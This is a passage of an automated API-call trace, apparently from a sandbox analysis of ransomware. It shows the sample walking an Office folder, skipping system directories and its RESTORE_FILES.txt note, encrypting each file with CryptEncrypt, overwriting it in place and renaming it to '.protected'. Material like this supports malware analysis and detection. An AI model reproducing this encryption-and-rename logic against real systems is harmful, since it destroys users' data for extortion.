lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0070.127] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0070.128] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0070.141] WriteFile (in: hFile=0xd8, lpBuffer=0x4a9210*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a9210*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0070.141] CloseHandle (hObject=0xd8) returned 1 [0070.143] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\OUTLLIBR.REST.trx_dll.protected") returned 83 [0070.143] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\OUTLLIBR.REST.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\outllibr.rest.trx_dll"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\OUTLLIBR.REST.trx_dll.protected" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\outllibr.rest.trx_dll.protected")) returned 1 [0070.143] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0070.144] lstrcmpiW (lpString1="OUTLWVW.DLL.trx_dll", lpString2="Windows") returned -1 [0070.144] lstrcmpiW (lpString1="OUTLWVW.DLL.trx_dll", lpString2="Program Files") returned -1 [0070.144] lstrcmpiW (lpString1="OUTLWVW.DLL.trx_dll", lpString2="Program Files (x86)") returned -1 [0070.144] lstrcmpiW (lpString1="OUTLWVW.DLL.trx_dll", lpString2="$Recycle.bin") returned 1 [0070.144] lstrcmpiW (lpString1="OUTLWVW.DLL.trx_dll", lpString2="System Volume Information") returned -1 [0070.144] wnsprintfW (in: 
pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\OUTLWVW.DLL.trx_dll") returned 71 [0070.144] StrStrIW (lpFirst="OUTLWVW.DLL.trx_dll", lpSrch=".protected") returned 0x0 [0070.144] lstrcmpW (lpString1="OUTLWVW.DLL.trx_dll", lpString2="RESTORE_FILES.txt") returned -1 [0070.144] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0070.144] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x30) returned 1 [0070.144] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\OUTLWVW.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\outlwvw.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0070.144] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\OUTLWVW.DLL.trx_dll") returned 71 [0070.144] StrStrW (lpFirst="OUTLWVW.DLL.trx_dll", lpSrch=".txt") returned 0x0 [0070.144] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\OUTLWVW.DLL.trx_dll") returned 71 [0070.144] StrStrW (lpFirst="OUTLWVW.DLL.trx_dll", lpSrch=".rar") returned 0x0 [0070.144] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\OUTLWVW.DLL.trx_dll") returned 71 [0070.144] StrStrW (lpFirst="OUTLWVW.DLL.trx_dll", lpSrch=".zip") returned 0x0 [0070.144] ReadFile (in: hFile=0xd8, lpBuffer=0x49dc50, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0070.161] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: 
lpNewFilePointer=0xffffffff) returned 1 [0070.161] WriteFile (in: hFile=0xd8, lpBuffer=0x49dc50*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0070.162] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0070.162] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0070.162] WriteFile (in: hFile=0xd8, lpBuffer=0x4a9210*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a9210*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0070.162] CloseHandle (hObject=0xd8) returned 1 [0070.162] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\OUTLWVW.DLL.trx_dll.protected") returned 81 [0070.163] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\OUTLWVW.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\outlwvw.dll.trx_dll"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\OUTLWVW.DLL.trx_dll.protected" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\outlwvw.dll.trx_dll.protected")) returned 1 [0070.163] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0070.163] lstrcmpiW (lpString1="PPINTL.DLL.trx_dll", lpString2="Windows") returned -1 [0070.163] lstrcmpiW (lpString1="PPINTL.DLL.trx_dll", lpString2="Program Files") returned -1 [0070.163] lstrcmpiW (lpString1="PPINTL.DLL.trx_dll", lpString2="Program Files (x86)") returned -1 [0070.163] lstrcmpiW 
(lpString1="PPINTL.DLL.trx_dll", lpString2="$Recycle.bin") returned 1 [0070.163] lstrcmpiW (lpString1="PPINTL.DLL.trx_dll", lpString2="System Volume Information") returned -1 [0070.163] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\PPINTL.DLL.trx_dll") returned 70 [0070.163] StrStrIW (lpFirst="PPINTL.DLL.trx_dll", lpSrch=".protected") returned 0x0 [0070.163] lstrcmpW (lpString1="PPINTL.DLL.trx_dll", lpString2="RESTORE_FILES.txt") returned -1 [0070.163] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0070.163] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x30) returned 1 [0070.164] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\PPINTL.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\ppintl.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0070.164] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\PPINTL.DLL.trx_dll") returned 70 [0070.164] StrStrW (lpFirst="PPINTL.DLL.trx_dll", lpSrch=".txt") returned 0x0 [0070.164] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\PPINTL.DLL.trx_dll") returned 70 [0070.164] StrStrW (lpFirst="PPINTL.DLL.trx_dll", lpSrch=".rar") returned 0x0 [0070.164] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\PPINTL.DLL.trx_dll") returned 70 [0070.164] StrStrW (lpFirst="PPINTL.DLL.trx_dll", lpSrch=".zip") returned 0x0 [0070.164] ReadFile (in: hFile=0xd8, lpBuffer=0x49dc50, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, 
lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0070.180] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0070.184] WriteFile (in: hFile=0xd8, lpBuffer=0x49dc50*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0070.185] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0070.185] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0070.185] WriteFile (in: hFile=0xd8, lpBuffer=0x4a9210*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a9210*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0070.185] CloseHandle (hObject=0xd8) returned 1 [0070.186] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\PPINTL.DLL.trx_dll.protected") returned 80 [0070.186] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\PPINTL.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\ppintl.dll.trx_dll"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\PPINTL.DLL.trx_dll.protected" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\ppintl.dll.trx_dll.protected")) returned 1 [0070.187] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0070.187] lstrcmpiW (lpString1="PPINTL.REST.trx_dll", lpString2="Windows") returned -1 [0070.187] lstrcmpiW 
(lpString1="PPINTL.REST.trx_dll", lpString2="Program Files") returned -1 [0070.187] lstrcmpiW (lpString1="PPINTL.REST.trx_dll", lpString2="Program Files (x86)") returned -1 [0070.187] lstrcmpiW (lpString1="PPINTL.REST.trx_dll", lpString2="$Recycle.bin") returned 1 [0070.187] lstrcmpiW (lpString1="PPINTL.REST.trx_dll", lpString2="System Volume Information") returned -1 [0070.187] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\PPINTL.REST.trx_dll") returned 71 [0070.187] StrStrIW (lpFirst="PPINTL.REST.trx_dll", lpSrch=".protected") returned 0x0 [0070.187] lstrcmpW (lpString1="PPINTL.REST.trx_dll", lpString2="RESTORE_FILES.txt") returned -1 [0070.187] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0070.187] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x30) returned 1 [0070.187] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\PPINTL.REST.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\ppintl.rest.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0070.188] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\PPINTL.REST.trx_dll") returned 71 [0070.188] StrStrW (lpFirst="PPINTL.REST.trx_dll", lpSrch=".txt") returned 0x0 [0070.188] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\PPINTL.REST.trx_dll") returned 71 [0070.188] StrStrW (lpFirst="PPINTL.REST.trx_dll", lpSrch=".rar") returned 0x0 [0070.188] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\PPINTL.REST.trx_dll") returned 71 [0070.188] StrStrW 
(lpFirst="PPINTL.REST.trx_dll", lpSrch=".zip") returned 0x0 [0070.189] ReadFile (in: hFile=0xd8, lpBuffer=0x49dc50, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0070.216] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0070.216] WriteFile (in: hFile=0xd8, lpBuffer=0x49dc50*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0070.217] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0070.217] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0070.232] WriteFile (in: hFile=0xd8, lpBuffer=0x4a9210*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a9210*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0070.232] CloseHandle (hObject=0xd8) returned 1 [0070.233] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\PPINTL.REST.trx_dll.protected") returned 81 [0070.233] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\PPINTL.REST.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\ppintl.rest.trx_dll"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\PPINTL.REST.trx_dll.protected" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\ppintl.rest.trx_dll.protected")) returned 1 [0070.234] 
FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0070.234] lstrcmpiW (lpString1="PUB6INTL.DLL.trx_dll", lpString2="Windows") returned -1 [0070.234] lstrcmpiW (lpString1="PUB6INTL.DLL.trx_dll", lpString2="Program Files") returned 1 [0070.234] lstrcmpiW (lpString1="PUB6INTL.DLL.trx_dll", lpString2="Program Files (x86)") returned 1 [0070.234] lstrcmpiW (lpString1="PUB6INTL.DLL.trx_dll", lpString2="$Recycle.bin") returned 1 [0070.234] lstrcmpiW (lpString1="PUB6INTL.DLL.trx_dll", lpString2="System Volume Information") returned -1 [0070.234] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\PUB6INTL.DLL.trx_dll") returned 72 [0070.234] StrStrIW (lpFirst="PUB6INTL.DLL.trx_dll", lpSrch=".protected") returned 0x0 [0070.234] lstrcmpW (lpString1="PUB6INTL.DLL.trx_dll", lpString2="RESTORE_FILES.txt") returned -1 [0070.234] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0070.234] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x30) returned 1 [0070.234] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\PUB6INTL.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\pub6intl.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0070.234] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\PUB6INTL.DLL.trx_dll") returned 72 [0070.234] StrStrW (lpFirst="PUB6INTL.DLL.trx_dll", lpSrch=".txt") returned 0x0 [0070.234] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\PUB6INTL.DLL.trx_dll") returned 72 [0070.234] 
StrStrW (lpFirst="PUB6INTL.DLL.trx_dll", lpSrch=".rar") returned 0x0 [0070.234] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\PUB6INTL.DLL.trx_dll") returned 72 [0070.234] StrStrW (lpFirst="PUB6INTL.DLL.trx_dll", lpSrch=".zip") returned 0x0 [0070.234] ReadFile (in: hFile=0xd8, lpBuffer=0x49dc50, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0070.316] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0070.316] WriteFile (in: hFile=0xd8, lpBuffer=0x49dc50*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0070.317] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0070.317] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0070.317] WriteFile (in: hFile=0xd8, lpBuffer=0x4a9210*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a9210*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0070.318] CloseHandle (hObject=0xd8) returned 1 [0070.318] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\PUB6INTL.DLL.trx_dll.protected") returned 82 [0070.318] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\PUB6INTL.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\pub6intl.dll.trx_dll"), 
lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\PUB6INTL.DLL.trx_dll.protected" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\pub6intl.dll.trx_dll.protected")) returned 1 [0070.450] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0070.450] lstrcmpiW (lpString1="PUB6INTL.REST.trx_dll", lpString2="Windows") returned -1 [0070.450] lstrcmpiW (lpString1="PUB6INTL.REST.trx_dll", lpString2="Program Files") returned 1 [0070.450] lstrcmpiW (lpString1="PUB6INTL.REST.trx_dll", lpString2="Program Files (x86)") returned 1 [0070.450] lstrcmpiW (lpString1="PUB6INTL.REST.trx_dll", lpString2="$Recycle.bin") returned 1 [0070.450] lstrcmpiW (lpString1="PUB6INTL.REST.trx_dll", lpString2="System Volume Information") returned -1 [0070.450] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\PUB6INTL.REST.trx_dll") returned 73 [0070.450] StrStrIW (lpFirst="PUB6INTL.REST.trx_dll", lpSrch=".protected") returned 0x0 [0070.450] lstrcmpW (lpString1="PUB6INTL.REST.trx_dll", lpString2="RESTORE_FILES.txt") returned -1 [0070.450] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0070.450] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x30) returned 1 [0070.450] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\PUB6INTL.REST.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\pub6intl.rest.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0070.450] lstrlenW 
(lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\PUB6INTL.REST.trx_dll") returned 73 [0070.450] StrStrW (lpFirst="PUB6INTL.REST.trx_dll", lpSrch=".txt") returned 0x0 [0070.450] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\PUB6INTL.REST.trx_dll") returned 73 [0070.450] StrStrW (lpFirst="PUB6INTL.REST.trx_dll", lpSrch=".rar") returned 0x0 [0070.450] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\PUB6INTL.REST.trx_dll") returned 73 [0070.450] StrStrW (lpFirst="PUB6INTL.REST.trx_dll", lpSrch=".zip") returned 0x0 [0070.450] ReadFile (in: hFile=0xd8, lpBuffer=0x49dc50, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0070.475] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0070.475] WriteFile (in: hFile=0xd8, lpBuffer=0x49dc50*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0070.476] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0070.476] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0070.503] WriteFile (in: hFile=0xd8, lpBuffer=0x4a9210*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a9210*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0070.503] CloseHandle (hObject=0xd8) returned 1 [0070.504] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: 
pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\PUB6INTL.REST.trx_dll.protected") returned 83 [0070.504] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\PUB6INTL.REST.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\pub6intl.rest.trx_dll"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\PUB6INTL.REST.trx_dll.protected" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\pub6intl.rest.trx_dll.protected")) returned 1 [0070.504] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0070.504] lstrcmpiW (lpString1="PUBWZINT.REST.trx_dll", lpString2="Windows") returned -1 [0070.504] lstrcmpiW (lpString1="PUBWZINT.REST.trx_dll", lpString2="Program Files") returned 1 [0070.504] lstrcmpiW (lpString1="PUBWZINT.REST.trx_dll", lpString2="Program Files (x86)") returned 1 [0070.504] lstrcmpiW (lpString1="PUBWZINT.REST.trx_dll", lpString2="$Recycle.bin") returned 1 [0070.504] lstrcmpiW (lpString1="PUBWZINT.REST.trx_dll", lpString2="System Volume Information") returned -1 [0070.504] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\PUBWZINT.REST.trx_dll") returned 73 [0070.504] StrStrIW (lpFirst="PUBWZINT.REST.trx_dll", lpSrch=".protected") returned 0x0 [0070.504] lstrcmpW (lpString1="PUBWZINT.REST.trx_dll", lpString2="RESTORE_FILES.txt") returned -1 [0070.504] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0070.504] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x30) returned 1 [0070.504] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\PUBWZINT.REST.trx_dll" (normalized: 
